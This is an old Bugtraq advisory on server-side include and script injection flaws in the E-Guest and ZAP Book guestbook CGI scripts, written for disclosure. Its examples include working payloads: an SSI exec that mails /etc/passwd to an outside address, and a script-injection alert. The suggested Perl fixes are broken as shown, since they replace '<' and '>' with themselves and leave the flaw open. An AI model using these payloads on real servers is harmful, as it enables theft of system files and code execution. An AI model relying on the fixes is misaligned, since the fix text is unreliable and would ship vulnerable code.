[26014] in bugtraq
SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
daemon@ATHENA.MIT.EDU (DownBload)
Sat Jun 29 12:42:16 2002
Date: 29 Jun 2002 09:58:21 -0000
Message-ID: <20020629095821.6053.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: DownBload <downbload@hotmail.com>
To: bugtraq@securityfocus.com
[ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
Advisory number: 6
Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)
---[ E-Guest
Author: Leung Eric
E-mail: cgi@leungeric.com
Homepage: http://leungeric.com
Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl
---[ ZAP Book
Author: Sephiroth32
E-mail: sephiroth32@unitedff.com
Homepage: http://www.unitedff.com
Date: 28.06.2002
Impact: remote user can execute shell commands & cross site scripting
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: downbload@hotmail.com
======[ Overview
--[ E-Guest is "...full feature guestbook written in Perl...".
Maybe little too much 'full feature' ;).
--[ ZAP Book is guestbook too, but it is more advanced than E-Guest.
======[ Problem
It looks that it is very hard to find secure guestbook. ;).
--[ E-Guest author wrote - "HTML tag filtering". That is true, but only
'comment' is filtered, and there is still name, email, homepage and
location, where we can put our nasty SSI or CSS code.
--[ ZAP Book is different animal. In ZAP Book, almost everything is
filtered. Exception is 'post' variable, which contains user comment,
so again, we can put our nasty SSI or CSS code in 'post' variable.
======[ Examples
---[ E-Guest
SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-
->
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.
CSS attack
~~~~~~~~~~
Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script>
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just CSS attack.
---[ ZAP Book
SSI attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: SSI attack <!--#exec cmd="/bin/mail downbload@hotmail.com
< /etc/passwd"-->
CSS attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: CSS attack <script>javascript:alert('HACKED BY DOWNBLOAD');</script>
======[ Solution
As i said in 'Makebook advisory', solution for SSI & CSS attack is
filtering
special characters from user input.
---[ E-Guest
FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-):
...
$fullname =~ s/</</g;
$fullname =~ s/>/>/g;
$email =~ s/</</g;
$email =~ s/>/>/g;
$homepage =~ s/</</g;
$homepage =~ s/>/>/g;
$uin =~ s/</</g;
$uin =~ s/>/>/g;
$location =~ s/</</g;
$location =~ s/>/>/g;
...
---[ ZAP Book
FIX: Add next code to addentry.cgi (or wait for fixed version :-):
...
$in{'post'} =~ s/</</g;
$in{'post'} =~ s/>/>/g;
...
======[ Greetz
Greetz goes to #hr.hackers <irc.carnet.hr>.
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis,
Fr1c, harlequin, Astral and www.active-security.org.
Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his
stupid friend h4x0r.
